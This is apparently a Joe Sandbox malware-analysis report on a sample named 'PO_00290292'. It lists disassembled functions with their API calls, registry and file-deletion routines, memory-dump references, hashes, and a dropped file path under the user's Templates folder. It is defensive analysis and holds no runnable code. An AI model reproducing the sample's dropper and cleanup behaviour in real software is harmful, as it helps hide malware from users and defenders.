                                                                  • Instruction Fuzzy Hash: 06813471D04228CFDF24CFA8C844BADBBB1FB44305F25816AD856BB291C7789A86DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406697 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                                  • Instruction ID: 5389f57cfb4a3ea8b0a271fe5c21418892ef356aef38e154ca47b5156c43700c
                                                                  • Opcode Fuzzy Hash: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
                                                                  • Instruction Fuzzy Hash: 37816831D04229CBDF24CFA8C844BADBBB0FF44305F11816AD956BB281D7785986DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406AE5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                                  • Instruction ID: 7cecadd07089ef5f508d2048bcf4206a214b5fe31ba49bd0cdf53ec9cfb3ce0b
                                                                  • Opcode Fuzzy Hash: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
                                                                  • Instruction Fuzzy Hash: 35712175D04228CBDF28CFA8C844BADBBB1FB44305F15816AD806BB281D7789A96DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406C03 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                                  • Instruction ID: f96eec566abe8136b7696836c8602221009d3abbc3cba5cf828ad5cd02611e0d
                                                                  • Opcode Fuzzy Hash: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
                                                                  • Instruction Fuzzy Hash: 56713371D04228CBEF28CFA8C844BADBBB1FF44305F15816AD856BB281C7789996DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406B4F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                                  • Instruction ID: 17f295adf0ba2181094cfffbed918b39bb4908eb68d6975640ddb9889f0749db
                                                                  • Opcode Fuzzy Hash: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
                                                                  • Instruction Fuzzy Hash: F2714531D04229CBEF28CF98C844BADBBB1FF44305F11816AD816BB291C7785A96DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                    • Part of subcall function 004052DD: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00402E19), ref: 00405338
                                                                    • Part of subcall function 004052DD: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\), ref: 0040534A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 334405425-0
                                                                  • Opcode ID: 68a78ee8fa017585f8b54af057a81de7910946204d32f94ef4e16293bebe516e
                                                                  • Instruction ID: 135227bab5bbd0cb957ad13063370cb04025123e1843093ab7a3381522db9c00
                                                                  • Opcode Fuzzy Hash: 68a78ee8fa017585f8b54af057a81de7910946204d32f94ef4e16293bebe516e
                                                                  • Instruction Fuzzy Hash: 7D21A731900219EBCF20AFA5CE48A9E7E71BF00354F20427BF511B51E1DBBD8A81DA5D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                  • RegEnumValueW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 167947723-0
                                                                  • Opcode ID: 8f0220e1db65b98a9a97dda6677fe8e3d64efce9e8ca8f1893c3e0ec0e4c3eff
                                                                  • Instruction ID: c7ec42ec2a5b8cbcf97019b844e04a4f9c539befeef3331d530b96059407f5ff
                                                                  • Opcode Fuzzy Hash: 8f0220e1db65b98a9a97dda6677fe8e3d64efce9e8ca8f1893c3e0ec0e4c3eff
                                                                  • Instruction Fuzzy Hash: FCF03171A14204EBEB209F65DE8CABF767DEF80354B10843FF505B61D0DAB84D419B69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405927 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00405D2E: GetFileAttributesW.KERNELBASE(?,?,00405933,?,?,00000000,00405B09,?,?,?,?), ref: 00405D33
                                                                    • Part of subcall function 00405D2E: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405D47
                                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405B09), ref: 00405942
                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000000,00405B09), ref: 0040594A
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405962
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                                                  • String ID:
                                                                  • API String ID: 1655745494-0
                                                                  • Opcode ID: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
                                                                  • Instruction ID: ecea3d8082f0941e5ee01c5501cf82e541f4c7e763f85e657b920a2cf98d934c
                                                                  • Opcode Fuzzy Hash: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
                                                                  • Instruction Fuzzy Hash: 6EE09B72105A91D6D21067349E0CB5F2AD8DF96335F09493EF595F11D0C778880ACA7D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3677997916-0
                                                                  • Opcode ID: f2a8e28ff262e398c83ec6795697b3da2d976eaa4e9bfe855c751e768ecc29ae
                                                                  • Instruction ID: a4ed2935f8c713a64b441f8b02302a8faa8aa65f3841d01997d269d515fb9b23
                                                                  • Opcode Fuzzy Hash: f2a8e28ff262e398c83ec6795697b3da2d976eaa4e9bfe855c751e768ecc29ae
                                                                  • Instruction Fuzzy Hash: 9D119131911205EBDB10CFA0CA489AEB7B4EF44354B20843FE446B72D0D6B85A41DB19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                                  • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
                                                                  • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                                  • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteOpenValue
                                                                  • String ID:
                                                                  • API String ID: 849931509-0
                                                                  • Opcode ID: 2137f07228e7049a48c43a80b617cac71fc03f597c3c39b68645fbf02ee1db44
                                                                  • Instruction ID: b5033fe3495a5d5fbf66e52db86fe43622c16bf705f2fe0f4142c4154f9543e6
                                                                  • Opcode Fuzzy Hash: 2137f07228e7049a48c43a80b617cac71fc03f597c3c39b68645fbf02ee1db44
                                                                  • Instruction Fuzzy Hash: 45F04F32A04110ABEB11BFB59B4EABE726A9B40314F15807BF501B71D5D9FC99025629
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004053B0 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 004053C0
                                                                    • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 0040540C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
